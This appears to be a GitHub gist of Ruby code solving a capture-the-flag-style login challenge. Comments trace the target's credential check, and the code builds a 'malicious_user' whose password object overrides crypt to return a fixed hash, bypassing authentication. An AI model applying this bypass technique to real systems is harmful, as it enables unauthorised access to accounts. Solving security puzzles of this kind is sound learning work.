Created
May 6, 2014 22:44
-
-
Save JoshBrodieNZ/d8435690fda43ccb5365 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #@user = nil | |
| #attempt = given_credentials | |
| #check_sanity(attempt) - String(given.username) to return given.username. | |
| #crypt_password!(attempt) given.password.crypt(SALT) will replace given.password | |
| #check_credentials!(attempt) | |
| #Users are loaded through JSON.load and mapped to SecureCredentials using lambda, then converted to set. | |
| #ADMIN is concatenated onto this set. | |
| #This set needs to include the given SecureCredentials object. | |
| #We search the set of users for users where the username matches | |
| #We save the user as @user if the password matches. | |
| #puts welcome calls logged_in? | |
| #admin? looks vulnerable. user.==(ADMIN) if my object is user, can modify the admin, so I need to get my malicious | |
| #credentials into user. | |
| module Frontend | |
| ObjectSpace.each_object(Class) {|x| p x } | |
| SecureCredentials = Struct.new(:username, :password) | |
| def given_credentials | |
| password = 'yo1QEK9HWD6qI' | |
| def password.crypt(n) | |
| 'yo1QEK9HWD6qI' | |
| end | |
| malicious_user = SecureCredentials.new('adrian',password) | |
| malicious_user | |
| end | |
| end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment